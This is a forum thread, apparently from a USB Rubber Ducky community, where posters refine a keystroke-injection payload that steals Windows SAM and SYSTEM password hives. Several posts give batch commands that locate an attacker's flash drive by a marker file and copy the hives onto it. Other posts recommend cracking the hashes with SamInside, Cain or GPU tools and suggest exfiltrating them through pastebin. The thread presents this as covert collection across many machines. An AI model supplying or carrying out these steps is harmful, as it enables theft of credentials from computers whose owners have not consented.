Jump to content

[Payload] Improvement to SAM payload


overwraith
 Share

Recommended Posts

If you add a removable flash drive and USB hub to the duckey SAM attack (take em with you in your pocket + use the hub to plug in simultaneously) and add the file evac.txt to the flash drives root you can replace the CD <Directory> command in the SAM payload with this command which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we wont even need the hub and flash drive. I am still testing this, so an additional delay may need added after this command.


STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )
Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

I spoke a little too soon, don't use CD for change directory as I did in the first post, use the following;

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )
Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following;

SAM --> SAM1

--> SAM2

--> SAM3

--> SAM4

; So we can store multiple user SAM's without loosing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAM's?

Link to comment
Share on other sites

Nice! Theres been loads of great improvements on my original payload. The only thing that immediately comes to mind is creating folders for each SAM file (or just file names) based on %computername%.


for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\%computername%.txt %a: )

And theres a free program called SamInside which can brute force SAM and SYSTEM files. It's not that fast, so it might be better to export the NTLM hashes into Cain or GPU cracker if you're one of those lucky people...

Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

Im glad people think this is cool, I will look into using SamInside or the export to NTLM hashes then cain or GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername%, and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back to back encrypted data, but if all sam files are the same size, then it should'nt be a problem, as we can always parse the data via command filters/flags, or seperate it into other files later. Good points from everybody.

Link to comment
Share on other sites

  • 2 weeks later...

I dunno if this has been mentioned before but maybe pastebin could be used to drop the data once its been fetched.

1- get the hash

2-open browser in pastebin -> login pastebin -> paste the hash -> logout -> close browser

3- tada

didnt try it but im pretty sure its doable. the reason why you wanna log in pastebin is so that you can easily access your paste once you go back home.

Link to comment
Share on other sites

  • 4 weeks later...

If you take a look at a project called Nishang, which is a pen testing framework using powershell, I'm sure there was a payload that uses a pastebin account and the API to upload stolen information. Perhaps you could look into that.

The same guy who wrote Nishang also wrote Kautilya which is a great HID pentesting framework for the Teensy boards, porting to the Ducky would be an interesting project...

Link to comment
Share on other sites

  • 1 month later...

In case anyone is curious, I have my setup so that it uses both the evac.txt check and prior to running scripts, it creates a folder using computer name which works great for multiple attacks without overwriting(unless people have the same computer name). In theory you could loop through similar to the drive name to check for a file and append a number increasing until it has a free space, but meh. I'm currently using the twin duck and it works great for storing. then i just plug my sd into my linux system and use samdump.

I'm having two weird issues and I'm not sure if they're related. First, the create part of vssown is failing due to an error, which i don't get the opportunity to copy and paste. next time i'll tweak it so it stops there and i can get the error or just remove the exit, as it's not necessary while i'm testing.

The second part is that the SYSTEM file takes 5 minutes + to download to the flash drive. I'm not sure if this relates to the vssown or if it's because i'm copying back to a usb that's also handling the commands or if it's the size, which is only 28mb. It still works, but i'm prefer a *snap* done result.

Edited by smacks
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...